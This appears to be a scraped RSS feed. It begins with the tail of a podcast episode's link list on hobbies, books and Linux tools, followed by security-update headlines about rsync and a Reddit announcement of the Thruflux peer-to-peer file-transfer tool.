</p>

<p>

</p>

<p>

<a href="https://store.sunlu.com/collections/wood/products/optimized-wood-pla-3d-printer-filament-1kg-optimized-and-upgraded-wood-texture" rel="noopener noreferrer" target="_blank">
https://store.sunlu.com/collections/wood/products/optimized-wood-pla-3d-printer-filament-1kg-optimized-and-upgraded-wood-texture</a>

</p>

<p>

</p>

<p>

Hobby Lobby
</p>

<p>

</p>

<p>

<a href="https://www.hobbylobby.com/" rel="noopener noreferrer" target="_blank">
https://www.hobbylobby.com/</a>

</p>

<p>

</p>

<p>

Hobby Lobby Branded PLA 
</p>

<p>

</p>

<p>

<a href="https://www.hobbylobby.com/crafts-hobbies/kids-crafts-activities/arts-crafts-supplies/white---3d-printing-filament/p/81250151" rel="noopener noreferrer" target="_blank">
https://www.hobbylobby.com/crafts-hobbies/kids-crafts-activities/arts-crafts-supplies/white---3d-printing-filament/p/81250151</a>

</p>

<p>

</p>

<p>

Hot End
</p>

<p>

</p>

<p>

<a href="https://e3d-online.com/blogs/news/anatomy-of-a-hotend" rel="noopener noreferrer" target="_blank">
https://e3d-online.com/blogs/news/anatomy-of-a-hotend</a>

</p>

<p>

</p>

<p>

2.5 GB Network Switch
</p>

<p>

</p>

<p>

<a href="https://www.servethehome.com/the-ultimate-cheap-2-5gbe-switch-mega-round-up-buyers-guide-qnap-netgear-hasivo-mokerlink-trendnet-zyxel-tp-link/" rel="noopener noreferrer" target="_blank">
https://www.servethehome.com/the-ultimate-cheap-2-5gbe-switch-mega-round-up-buyers-guide-qnap-netgear-hasivo-mokerlink-trendnet-zyxel-tp-link/</a>

</p>

<p>

</p>

<p>

fsck
</p>

<p>

</p>

<p>

<a href="https://linux.die.net/man/8/fsck" rel="noopener noreferrer" target="_blank">
https://linux.die.net/man/8/fsck</a>

</p>

<p>

</p>

<p>

ProxMox
</p>

<p>

</p>

<p>

<a href="https://www.proxmox.com/en/" rel="noopener noreferrer" target="_blank">
https://www.proxmox.com/en/</a>

</p>

<p>

</p>

<p>

Open Media Vault
</p>

<p>

</p>

<p>

<a href="https://www.openmediavault.org/" rel="noopener noreferrer" target="_blank">
https://www.openmediavault.org/</a>

</p>

<p>

</p>

<p>

Readarr
</p>

<p>

</p>

<p>

<a href="https://github.com/Readarr/Readarr" rel="noopener noreferrer" target="_blank">
https://github.com/Readarr/Readarr</a>

</p>

<p>

</p>

<p>

RSYNC
</p>

<p>

</p>

<p>

<a href="https://linux.die.net/man/1/rsync" rel="noopener noreferrer" target="_blank">
https://linux.die.net/man/1/rsync</a>

</p>

<p>

</p>

<p>

Mario Kart T Shirt
</p>

<p>

</p>

<p>

<a href="https://www.nintendo.com/us/store/products/mario-kart-jersey-t-shirt-119900-1/" rel="noopener noreferrer" target="_blank">
https://www.nintendo.com/us/store/products/mario-kart-jersey-t-shirt-119900-1/</a>

</p>

<p>

</p>

<p>

Super Nintendo World
</p>

<p>

</p>

<p>

<a href="https://www.universalorlando.com/web/en/us/epic-universe/worlds/super-nintendo-world" rel="noopener noreferrer" target="_blank">
https://www.universalorlando.com/web/en/us/epic-universe/worlds/super-nintendo-world</a>

</p>

<p>

</p>

<p>

Mario Kart Ride (Universal Studios - Super Nintendo World)
</p>

<p>

</p>

<p>

<a href="https://www.universalorlando.com/web/en/us/things-to-do/rides-attractions/mario-kart-bowsers-challenge" rel="noopener noreferrer" target="_blank">
https://www.universalorlando.com/web/en/us/things-to-do/rides-attractions/mario-kart-bowsers-challenge</a>

</p>

<p>

</p>

<p>

Donkey Kong Country (Universal Studios - Super Nintendo World)
</p>

<p>

</p>

<p>

<a href="https://www.zeldadungeon.net/forum/threads/donkey-kong-themed-area-to-open-at-usj-dec-11-2024.77660/" rel="noopener noreferrer" target="_blank">
https://www.zeldadungeon.net/forum/threads/donkey-kong-themed-area-to-open-at-usj-dec-11-2024.77660/</a>

</p>

<p>

</p>

<p>

Donkey Kong Country (video game)
</p>

<p>

</p>

<p>

<a href="https://donkeykong.fandom.com/wiki/Donkey_Kong_Country" rel="noopener noreferrer" target="_blank">
https://donkeykong.fandom.com/wiki/Donkey_Kong_Country</a>

</p>

<p>

</p>

<p>

Mario Games
</p>

<p>

</p>

<p>

<a href="https://nintendo.fandom.com/wiki/List_of_Mario_games" rel="noopener noreferrer" target="_blank">
https://nintendo.fandom.com/wiki/List_of_Mario_games</a>

</p>

<p>

</p>

<p>

Mario World 2
</p>

<p>

</p>

<p>

<a href="https://www.mariowiki.com/Super_Mario_World_2:_Yoshi%27s_Island" rel="noopener noreferrer" target="_blank">
https://www.mariowiki.com/Super_Mario_World_2:_Yoshi%27s_Island</a>

</p>

<p>

</p>

<p>

Harry Potter Ride
</p>

<p>

</p>

<p>

<a href="https://www.universalorlando.com/web/en/us/things-to-do/rides-attractions/harry-potter-and-the-forbidden-journey" rel="noopener noreferrer" target="_blank">
https://www.universalorlando.com/web/en/us/things-to-do/rides-attractions/harry-potter-and-the-forbidden-journey</a>

</p>

<p>

</p>

<p>

Hagrid’s Magical Creatures Motorbike Adventure
</p>

<p>

</p>

<p>

<a href="https://www.universalorlando.com/web/en/us/things-to-do/rides-attractions/hagrids-magical-creatures-motorbike-adventure" rel="noopener noreferrer" target="_blank">
https://www.universalorlando.com/web/en/us/things-to-do/rides-attractions/hagrids-magical-creatures-motorbike-adventure</a>

</p>

<p>

</p>

<p>

Harry Potter Wands
</p>

<p>

</p>

<p>

<a href="https://www.universalorlando.com/web/en/us/things-to-do/shopping/potter-wands" rel="noopener noreferrer" target="_blank">
https://www.universalorlando.com/web/en/us/things-to-do/shopping/potter-wands</a>

</p>

<p>

</p>

<p>

Harry Potter Wand Holder (3D printable)
</p>

<p>

</p>

<p>

<a href="https://makerworld.com/en/models/917744-wand-stand-harry-potter#profileId-879432" rel="noopener noreferrer" target="_blank">
https://makerworld.com/en/models/917744-wand-stand-harry-potter#profileId-879432</a>

</p>

<p>

</p>

<p>

Bronze PLA 
</p>

<p>

</p>

<p>

<a href="https://www.hatchbox3d.com/products/3d-pla-1kg1-75-brnz" rel="noopener noreferrer" target="_blank">
https://www.hatchbox3d.com/products/3d-pla-1kg1-75-brnz</a>

</p>

<p>

</p>

<p>

Linux Mint
</p>

<p>

</p>

<p>

<a href="https://linuxmint.com/" rel="noopener noreferrer" target="_blank">
https://linuxmint.com/</a>

</p>

<p>

</p>

<p>

Clem (Linux Mint)
</p>

<p>

</p>

<p>

<a href="https://blog.linuxmint.com/?author=1" rel="noopener noreferrer" target="_blank">
https://blog.linuxmint.com/?author=1</a>

</p>

<p>

</p>

<p>

New Harry Potter TV Show
</p>

<p>

</p>

<p>

<a href="https://www.teenvogue.com/story/harry-potter-tv-reboot-hbo-everything-you-need-to-know" rel="noopener noreferrer" target="_blank">
https://www.teenvogue.com/story/harry-potter-tv-reboot-hbo-everything-you-need-to-know</a>

</p>

<p>

</p>

<p>

JK Rowling
</p>

<p>

</p>

<p>

<a href="https://www.jkrowling.com/" rel="noopener noreferrer" target="_blank">
https://www.jkrowling.com/</a>

</p>

<p>

</p>

<p>

HBO
</p>

<p>

</p>

<p>

<a href="https://www.hbomax.com/" rel="noopener noreferrer" target="_blank">
https://www.hbomax.com/</a>

</p>

<p>

</p>

<p>

Iraq
</p>

<p>

</p>

<p>

<a href="https://www.state.gov/countries-areas/iraq" rel="noopener noreferrer" target="_blank">
https://www.state.gov/countries-areas/iraq</a>

</p>

<p>

</p>

<p>

Arcane Casebook  (Author - Dan Willis)
</p>

<p>

</p>

<p>

<a href="https://www.goodreads.com/series/259903-arcane-casebook" rel="noopener noreferrer" target="_blank">
https://www.goodreads.com/series/259903-arcane-casebook</a>

</p>

<p>

</p>

<p>

Altered Carbon (Book)
</p>

<p>

</p>

<p>

<a href="https://elitistbookreviews.com/2018/04/05/altered-carbon/" rel="noopener noreferrer" target="_blank">
https://elitistbookreviews.com/2018/04/05/altered-carbon/</a>

</p>

<p>

</p>

<p>

Arcanum Unbounded (Author -  Brandon Sanderson)
</p>

<p>

</p>

<p>

<a href="https://www.brandonsanderson.com/blogs/blog/introducing-arcanum-unbounded" rel="noopener noreferrer" target="_blank">
https://www.brandonsanderson.com/blogs/blog/introducing-arcanum-unbounded</a>

</p>

<p>

</p>

<p>

Amazon Music
</p>

<p>

</p>

<p>

<a href="https://music.amazon.com/?referrer=https%3A%2F%2Fwww.google.com%2F" rel="noopener noreferrer" target="_blank">
https://music.amazon.com/?referrer=https%3A%2F%2Fwww.google.com%2F</a>

</p>

<p>

</p>

<p>

Richard Pryor
</p>

<p>

</p>

<p>

<a href="https://www.richardpryor.com/" rel="noopener noreferrer" target="_blank">
https://www.richardpryor.com/</a>

</p>

<p>

</p>

<p>

John Pinette
</p>

<p>

</p>

<p>

<a href="https://www.dead-frog.com/comedians/comic/john-pinette" rel="noopener noreferrer" target="_blank">
https://www.dead-frog.com/comedians/comic/john-pinette</a>

</p>

<p>

</p>

<p>

Stormlight Archive 
</p>

<p>

</p>

<p>

<a href="https://www.brandonsanderson.com/pages/the-stormlight-archive-series" rel="noopener noreferrer" target="_blank">
https://www.brandonsanderson.com/pages/the-stormlight-archive-series</a>

</p>

<p>

</p>

<p>

Mistborn Saga
</p>

<p>

</p>

<p>

<a href="https://www.brandonsanderson.com/pages/the-mistborn-saga-the-original-trilogy" rel="noopener noreferrer" target="_blank">
https://www.brandonsanderson.com/pages/the-mistborn-saga-the-original-trilogy</a>

</p>

<p>

</p>

<p>

The Last Airbender
</p>

<p>

</p>

<p>

<a href="https://avatar.fandom.com/wiki/Avatar:_The_Last_Airbender" rel="noopener noreferrer" target="_blank">
https://avatar.fandom.com/wiki/Avatar:_The_Last_Airbender</a>

</p>

<p>

</p>

<p>

Wax and Wayne
</p>

<p>

</p>

<p>

<a href="https://www.brandonsanderson.com/pages/the-mistborn-saga-the-wax-wayne-series" rel="noopener noreferrer" target="_blank">
https://www.brandonsanderson.com/pages/the-mistborn-saga-the-wax-wayne-series</a>

</p>

<p>

</p>

<p>

Tress And The Emerald Sea
</p>

<p>

</p>

<p>

<a href="https://www.brandonsanderson.com/pages/standalones-cosmere" rel="noopener noreferrer" target="_blank">
https://www.brandonsanderson.com/pages/standalones-cosmere</a>

</p>

<p>

</p>

<p>

Isles of the Amber Dark
</p>

<p>

</p>

<p>

Legion
</p>

<p>

</p>

<p>

<a href="https://www.brandonsanderson.com/pages/collections-non-cosmere" rel="noopener noreferrer" target="_blank">
https://www.brandonsanderson.com/pages/collections-non-cosmere</a>

</p>

<p>

</p>

<p>

Wheel of Time (Sanderson books)
</p>

<p>

</p>

<p>

<a href="https://www.brandonsanderson.com/pages/the-wheel-of-time-series" rel="noopener noreferrer" target="_blank">
https://www.brandonsanderson.com/pages/the-wheel-of-time-series</a>

</p>

<p>

</p>

<p>

Sunreach 
</p>

<p>

</p>

<p>

<a href="https://www.brandonsanderson.com/pages/skyward-flight" rel="noopener noreferrer" target="_blank">
https://www.brandonsanderson.com/pages/skyward-flight</a>

</p>

<p>

</p>

<p>

Benedict Jacka
</p>

<p>

</p>

<p>

<a href="https://benedictjacka.co.uk/" rel="noopener noreferrer" target="_blank">
https://benedictjacka.co.uk/</a>

</p>

<p>

</p>

<p>

</p>

<p>

Project Hail Mary (Andy Weir)
</p>

<p>

</p>

<p>

<a href="https://andyweirauthor.com/#project-hail-mary" rel="noopener noreferrer" target="_blank">
https://andyweirauthor.com/#project-hail-mary</a>

</p>

<p>

</p>

<p>

The Martian (Andy Weir)
</p>

<p>

</p>

<p>

<a href="https://andyweirauthor.com/#the-martian" rel="noopener noreferrer" target="_blank">
https://andyweirauthor.com/#the-martian</a>

</p>

<p>

</p>

<p>

Artemis  (Andy Weir)
</p>

<p>

</p>

<p>

<a href="https://andyweirauthor.com/#artemis" rel="noopener noreferrer" target="_blank">
https://andyweirauthor.com/#artemis</a>

</p>

<p>

</p>

<p>

Libby
</p>

<p>

</p>

<p>

<a href="https://libbyapp.com/interview/welcome#doYouHaveACard" rel="noopener noreferrer" target="_blank">
https://libbyapp.com/interview/welcome#doYouHaveACard</a>

</p>

<p>

</p>

<p>

Analog Hole
</p>

<p>

</p>

<p>

<a href="https://en.wikipedia.org/wiki/Analog_hole" rel="noopener noreferrer" target="_blank">
https://en.wikipedia.org/wiki/Analog_hole</a>

</p>

<p>

</p>


<p><a href="https://hackerpublicradio.org/eps/hpr4582/index.html#comments">Provide <strong>feedback</strong> on this episode</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Security updates for Tuesday]]></title>
<description><![CDATA[Security updates have been issued by AlmaLinux (gimp, go-toolset:rhel8, and golang), Debian (roundcube), Fedora (gnupg2, libpng, and rsync), Mageia (dcmtk and usbmuxd), Oracle (gcc-toolset-14-binutils, gimp, gnupg2, go-toolset:ol8, golang, kernel, and openssl), Slackware (libssh, lrzip, and mozil...]]></description>
<link>https://tsecurity.de/de/3293282/linux-tipps/security-updates-for-tuesday/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3293282/linux-tipps/security-updates-for-tuesday/</guid>
<pubDate>Tue, 17 Feb 2026 15:07:09 +0100</pubDate>
<category>🐧 Linux Tipps</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Security updates have been issued by <b>AlmaLinux</b> (gimp, go-toolset:rhel8, and golang), <b>Debian</b> (roundcube), <b>Fedora</b> (gnupg2, libpng, and rsync), <b>Mageia</b> (dcmtk and usbmuxd), <b>Oracle</b> (gcc-toolset-14-binutils, gimp, gnupg2, go-toolset:ol8, golang, kernel, and openssl), <b>Slackware</b> (libssh, lrzip, and mozilla), <b>SUSE</b> (abseil-cpp, chromium, curl, elemental-toolkit, elemental-operator, expat, freerdp, iperf, libnvidia-container, libsoup, libxml2, net-snmp, openCryptoki, openssl-3, patch, protobuf, python-urllib3, python-xmltodict, python311, screen, systemd, and util-linux), and <b>Ubuntu</b> (alsa-lib, gnutls28, and linux-aws, linux-oracle).]]></content:encoded>
</item>
<item>
<title><![CDATA[Pufferüberlauf in rsync (Fedora)]]></title>
<description><![CDATA[]]></description>
<link>https://tsecurity.de/de/3292360/it-security-nachrichten/pufferueberlauf-in-rsync-fedora/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3292360/it-security-nachrichten/pufferueberlauf-in-rsync-fedora/</guid>
<pubDate>Tue, 17 Feb 2026 07:05:01 +0100</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
</item>
<item>
<title><![CDATA[IT-Sicherheit: UNIX gefährdet - Update für IT-Sicherheitshinweis zu Rsync (Risiko: mittel)]]></title>
<description><![CDATA[IT-Sicherheit: UNIX gefährdet - Update für IT-Sicherheitshinweis zu Rsync (Risiko: mittel). Eine für Rsync herausgegebener Sicherheitshinweis hat ...]]></description>
<link>https://tsecurity.de/de/3274471/it-security-nachrichten/it-sicherheit-unix-gefaehrdet-update-fuer-it-sicherheitshinweis-zu-rsync-risiko-mittel/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3274471/it-security-nachrichten/it-sicherheit-unix-gefaehrdet-update-fuer-it-sicherheitshinweis-zu-rsync-risiko-mittel/</guid>
<pubDate>Sat, 07 Feb 2026 12:50:44 +0100</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<b>IT</b>-<b>Sicherheit</b>: UNIX gefährdet - Update für IT-Sicherheitshinweis zu Rsync (Risiko: mittel). Eine für Rsync herausgegebener Sicherheitshinweis hat ...]]></content:encoded>
</item>
<item>
<title><![CDATA[Thruflux : A new fast zero-setup P2P mass file transfers over QUIC]]></title>
<description><![CDATA[Hello r/linux, As you know, it's always plenty of pain for moving large files between devices. While there are equally plenty amount of other CLI-based (or UI only) file sharing tools out there, I wanted to tackle the challenge myself. After researching and playing around with some popular tools,...]]></description>
<link>https://tsecurity.de/de/3246214/linux-tipps/thruflux-a-new-fast-zero-setup-p2p-mass-file-transfers-over-quic/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3246214/linux-tipps/thruflux-a-new-fast-zero-setup-p2p-mass-file-transfers-over-quic/</guid>
<pubDate>Sun, 01 Feb 2026 02:52:00 +0100</pubDate>
<category>🐧 Linux Tipps</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<!-- SC_OFF --><div class="md"><p>Hello <a href="https://www.reddit.com/r/linux">r/linux</a>,</p> <p>As you know, it's always plenty of pain for moving large files between devices. While there are equally plenty amount of other CLI-based (or UI only) file sharing tools out there, I wanted to tackle the challenge myself. After researching and playing around with some popular tools, I started to ask these fundamental questions (Of course, correct me if I'm wrong):</p> <p><strong>- Why is there no popular mainstream p2p CLI tool that uses QUIC(UDP) protocol?</strong></p> <p><strong>- Why are there no p2p CLI tool that supports multiple receivers?</strong></p> <p><strong>- Why do most p2p CLI tools fall short of scp/rsync in terms of throughput?</strong></p> <p><strong>- Why do most p2p CLI tools treat multi-file, multi-directory transfers as a second-class case?</strong></p> <p><strong>- Why don't most p2p CLI tools not expose low transport-level configuration and tuning parameters that may be essential for special networks?</strong></p> <p>In order to address these questions, I wanted to design a toolkit that would make mass file sharing fast, simple, and flexible for everyone at no cost.</p> <p>The name is <strong>Thruflux</strong>, and I had one goal in mind : Maximize throughput without sacrificing ease of use.</p> <p>Over the past months, I worked on this tool to make moving large sets of files between arbitrary machines simpler and faster, most importantly without requiring SSH, servers, or port forwarding.</p> <p>I pondered over what languages to use, and at the end I decided to use either Go, Rust, or C++ in order to "juice out" the performance. However, I was quite unfamiliar with all three languages at the time, so I decided to learn Go (as it is arguably the easiest to learn out of three) and also receive some help from AI to engineer my ideas faster.</p> <p>The result is a cross-platform CLI written in Go that uses direct peer-to-peer transfers over QUIC, with automatic NAT traversal and relay fallback when needed. A single sender can serve multiple receivers concurrently, and directory transfers are handled natively, file-to-file without any compression/decompression.</p> <p>To experiment, I recently benchmarked it against scp, rsync, croc, and magic-wormhole to understand the tradeoffs more clearly. While it doesn’t always beat built-in infrastructure tools like scp/rsync in ideal conditions, it gets surprisingly close while solving a harder problem (zero-setup P2P), and transfer speeds shows much lower variance than single-stream TCP tools. Moreover, thruflux consistently outperformed comparable P2P CLI tools, particularly for multi-file transfers.</p> <p>The project is open source and still evolving - I'm happy to hear feedback, especially from people who move a lot of data around. My vision is to create a free, secure, fast mass file sharing CLI tool that is (hopefully and eventually) achieves throughputs close to infrastructure tools like scp/rsync, which many current p2p file transfer CLI tools out there fall short of. While clearly I'm not someone with vast amount of networking knowledge, I'm just a student who is curious and passionate about the file sharing experience.</p> <p>I've poured many thoughts and taken many measures into how to make this possible, and now I believe I have reached a point where I would like to invite some early users to try out the tool. I'd really appreciate if anyone who needs some data moved try out my tool.</p> <p>Thanks for taking the time to read this. I still have a lot to learn and would really appreciate any feedback, challenges, or insights. I really hope that one day this tool can be useful to someone and help solve a real problem.</p> <p>Repo + benchmarks: <a href="https://github.com/samsungplay/Thruflux">https://github.com/samsungplay/Thruflux</a></p> <p>How to install &amp; use the tool:</p> <p><strong>macOS / Linux (Homebrew)</strong></p> <pre><code>brew tap samsungplay/thruflux brew install thru </code></pre> <p><strong>Windows (Scoop)</strong></p> <pre><code>scoop bucket add thruflux https://github.com/samsungplay/scoop-thruflux scoop install thru </code></pre> <p><strong>Use</strong></p> <pre><code># host files (defaults to https://bytepipe.app + bundled STUN list) thru host ./photos ./videos # share the join code with multiple peers thru join ABCDEFGH --out ./downloads </code></pre> </div><!-- SC_ON -->   submitted by   <a href="https://www.reddit.com/user/samsungplay"> /u/samsungplay </a> <br> <span><a href="https://i.redd.it/mebfg1jv3sgg1.png">[link]</a></span>   <span><a href="https://www.reddit.com/r/linux/comments/1qsjgec/thruflux_a_new_fast_zerosetup_p2p_mass_file/">[comments]</a></span>]]></content:encoded>
</item>
<item>
<title><![CDATA[Security: Pufferüberlauf in rsync (SUSE)]]></title>
<description><![CDATA[]]></description>
<link>https://tsecurity.de/de/3215971/unix-server/security-pufferueberlauf-in-rsync-suse/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3215971/unix-server/security-pufferueberlauf-in-rsync-suse/</guid>
<pubDate>Thu, 15 Jan 2026 23:30:56 +0100</pubDate>
<category>🐧 Unix Server</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[ ]]></content:encoded>
</item>
<item>
<title><![CDATA[Security: Pufferüberlauf in rsync (SUSE)]]></title>
<description><![CDATA[]]></description>
<link>https://tsecurity.de/de/3215967/unix-server/security-pufferueberlauf-in-rsync-suse/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3215967/unix-server/security-pufferueberlauf-in-rsync-suse/</guid>
<pubDate>Thu, 15 Jan 2026 23:30:50 +0100</pubDate>
<category>🐧 Unix Server</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[ ]]></content:encoded>
</item>
<item>
<title><![CDATA[Security updates for Thursday]]></title>
<description><![CDATA[Security updates have been issued by Debian (chromium, gnupg2, and mongo-c-driver), Fedora (firefox, gpsd, linux-firmware, and seamonkey), Mageia (net-snmp), Oracle (kernel, podman, postgresql16, postgresql:13, postgresql:15, postgresql:16, and uek-kernel), Red Hat (libpq, net-snmp, and transfig)...]]></description>
<link>https://tsecurity.de/de/3215024/linux-tipps/security-updates-for-thursday/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3215024/linux-tipps/security-updates-for-thursday/</guid>
<pubDate>Thu, 15 Jan 2026 15:07:03 +0100</pubDate>
<category>🐧 Linux Tipps</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Security updates have been issued by <b>Debian</b> (chromium, gnupg2, and mongo-c-driver), <b>Fedora</b> (firefox, gpsd, linux-firmware, and seamonkey), <b>Mageia</b> (net-snmp), <b>Oracle</b> (kernel, podman, postgresql16, postgresql:13, postgresql:15, postgresql:16, and uek-kernel), <b>Red Hat</b> (libpq, net-snmp, and transfig), <b>Slackware</b> (libpng and mozilla), <b>SUSE</b> (avahi, bluez, capstone, curl, dpdk, firefox, firefox-esr, fluidsynth, glib2, kernel, kernel-devel, libmicrohttpd, libpcap, libpng16, libsoup, libsoup-3_0-0, libtasn1, libvirt, mcphost, openvswitch, ovmf, podman, poppler, python-tornado6, python311, qemu, rsync, and valkey), and <b>Ubuntu</b> (erlang, klibc, libpng1.6, and ruby-rack).]]></content:encoded>
</item>
<item>
<title><![CDATA[Security: Pufferüberlauf in rsync (SUSE)]]></title>
<description><![CDATA[]]></description>
<link>https://tsecurity.de/de/3204212/unix-server/security-pufferueberlauf-in-rsync-suse/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3204212/unix-server/security-pufferueberlauf-in-rsync-suse/</guid>
<pubDate>Fri, 09 Jan 2026 16:01:28 +0100</pubDate>
<category>🐧 Unix Server</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[ ]]></content:encoded>
</item>
<item>
<title><![CDATA[Security updates for Friday]]></title>
<description><![CDATA[Security updates have been issued by Debian (pdfminer and vlc), Red Hat (kernel, kernel-rt, and microcode_ctl), Slackware (libtasn1), SUSE (apptainer, curl, ImageMagick, libpcap, libvirt, libwget4, php8, podman, python311-cbor2, qemu, and rsync), and Ubuntu (gnupg, gnupg2, gpsd, libsodium, and py...]]></description>
<link>https://tsecurity.de/de/3204094/linux-tipps/security-updates-for-friday/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3204094/linux-tipps/security-updates-for-friday/</guid>
<pubDate>Fri, 09 Jan 2026 15:07:56 +0100</pubDate>
<category>🐧 Linux Tipps</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Security updates have been issued by <b>Debian</b> (pdfminer and vlc), <b>Red Hat</b> (kernel, kernel-rt, and microcode_ctl), <b>Slackware</b> (libtasn1), <b>SUSE</b> (apptainer, curl, ImageMagick, libpcap, libvirt, libwget4, php8, podman, python311-cbor2, qemu, and rsync), and <b>Ubuntu</b> (gnupg, gnupg2, gpsd, libsodium, and python-tornado).]]></content:encoded>
</item>
<item>
<title><![CDATA[Security updates for Wednesday]]></title>
<description><![CDATA[Security updates have been issued by AlmaLinux (resource-agents, ruby:3.3, thunderbird, and xorg-x11-server), Fedora (libpcap), Red Hat (brotli), Slackware (libsodium), SUSE (dcmtk, govulncheck-vulndb, libpcap, mozjs60, qemu, rsync, and usbmuxd), and Ubuntu (glib2.0 and linux-raspi, linux-raspi-5...]]></description>
<link>https://tsecurity.de/de/3199904/linux-tipps/security-updates-for-wednesday/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3199904/linux-tipps/security-updates-for-wednesday/</guid>
<pubDate>Wed, 07 Jan 2026 15:36:13 +0100</pubDate>
<category>🐧 Linux Tipps</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Security updates have been issued by <b>AlmaLinux</b> (resource-agents, ruby:3.3, thunderbird, and xorg-x11-server), <b>Fedora</b> (libpcap), <b>Red Hat</b> (brotli), <b>Slackware</b> (libsodium), <b>SUSE</b> (dcmtk, govulncheck-vulndb, libpcap, mozjs60, qemu, rsync, and usbmuxd), and <b>Ubuntu</b> (glib2.0 and linux-raspi, linux-raspi-5.4).]]></content:encoded>
</item>
<item>
<title><![CDATA[Security: Pufferüberlauf in rsync (SUSE)]]></title>
<description><![CDATA[]]></description>
<link>https://tsecurity.de/de/3198435/unix-server/security-pufferueberlauf-in-rsync-suse/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3198435/unix-server/security-pufferueberlauf-in-rsync-suse/</guid>
<pubDate>Tue, 06 Jan 2026 23:16:26 +0100</pubDate>
<category>🐧 Unix Server</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[ ]]></content:encoded>
</item>
<item>
<title><![CDATA[Security updates for Tuesday]]></title>
<description><![CDATA[Security updates have been issued by AlmaLinux (kernel, ruby, and thunderbird), Debian (libsodium and ruby-rmagick), Fedora (gnupg2 and proxychains-ng), Oracle (gcc-toolset-14-binutils, rsync, tar, and thunderbird), Red Hat (buildah, mariadb, mariadb10.11, podman, and tar), SUSE (alloy, apache2, ...]]></description>
<link>https://tsecurity.de/de/3197612/linux-tipps/security-updates-for-tuesday/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3197612/linux-tipps/security-updates-for-tuesday/</guid>
<pubDate>Tue, 06 Jan 2026 15:20:41 +0100</pubDate>
<category>🐧 Linux Tipps</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Security updates have been issued by <b>AlmaLinux</b> (kernel, ruby, and thunderbird), <b>Debian</b> (libsodium and ruby-rmagick), <b>Fedora</b> (gnupg2 and proxychains-ng), <b>Oracle</b> (gcc-toolset-14-binutils, rsync, tar, and thunderbird), <b>Red Hat</b> (buildah, mariadb, mariadb10.11, podman, and tar), <b>SUSE</b> (alloy, apache2, buildah, erlang26, glib2, ImageMagick, kernel, libsoup, pgadmin4, python-tornado6, python3, python312, python313, qemu, webkit2gtk3, and xen), and <b>Ubuntu</b> (webkit2gtk).]]></content:encoded>
</item>
<item>
<title><![CDATA[Security updates for Monday]]></title>
<description><![CDATA[Security updates have been issued by AlmaLinux (tar), Debian (curl and gimp), Fedora (doctl, gitleaks, gnupg2, grpcurl, nginx, nginx-mod-brotli, nginx-mod-fancyindex, nginx-mod-headers-more, nginx-mod-modsecurity, nginx-mod-naxsi, nginx-mod-vts, and usd), Mageia (cups), Red Hat (container-tools:r...]]></description>
<link>https://tsecurity.de/de/3195107/linux-tipps/security-updates-for-monday/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3195107/linux-tipps/security-updates-for-monday/</guid>
<pubDate>Mon, 05 Jan 2026 15:24:59 +0100</pubDate>
<category>🐧 Linux Tipps</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Security updates have been issued by <b>AlmaLinux</b> (tar), <b>Debian</b> (curl and gimp), <b>Fedora</b> (doctl, gitleaks, gnupg2, grpcurl, nginx, nginx-mod-brotli, nginx-mod-fancyindex, nginx-mod-headers-more, nginx-mod-modsecurity, nginx-mod-naxsi, nginx-mod-vts, and usd), <b>Mageia</b> (cups), <b>Red Hat</b> (container-tools:rhel8, go-toolset:rhel8, grafana, and skopeo), and <b>SUSE</b> (dirmngr, fluidsynth, gnu-recutils, libmatio-devel, python311-marshmallow, python312-Django6, rsync, and thunderbird).]]></content:encoded>
</item>
<item>
<title><![CDATA[Security: Pufferüberlauf in rsync (SUSE)]]></title>
<description><![CDATA[]]></description>
<link>https://tsecurity.de/de/3191453/unix-server/security-pufferueberlauf-in-rsync-suse/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3191453/unix-server/security-pufferueberlauf-in-rsync-suse/</guid>
<pubDate>Fri, 02 Jan 2026 22:31:08 +0100</pubDate>
<category>🐧 Unix Server</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[ ]]></content:encoded>
</item>
<item>
<title><![CDATA[RsyncUI 2.8.5: Frische Optik und Inspector-Ansicht in Arbeit]]></title>
<description><![CDATA[Thomas Evensen schraubt aktuell an Version 2.8.5 seines Tools RsyncUI (rsync ist ein leistungsstarkes und vielseitiges Befehlszeilen-Tool zur Synchronisierung von Dateien und Verzeichnissen zwischen verschiedenen Computern oder innerhalb des gleichen Computers). Die Software befindet sich derzeit...]]></description>
<link>https://tsecurity.de/de/3186855/it-nachrichten/rsyncui-285-frische-optik-und-inspector-ansicht-in-arbeit/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3186855/it-nachrichten/rsyncui-285-frische-optik-und-inspector-ansicht-in-arbeit/</guid>
<pubDate>Tue, 30 Dec 2025 20:31:49 +0100</pubDate>
<category>📰 IT Nachrichten</category>
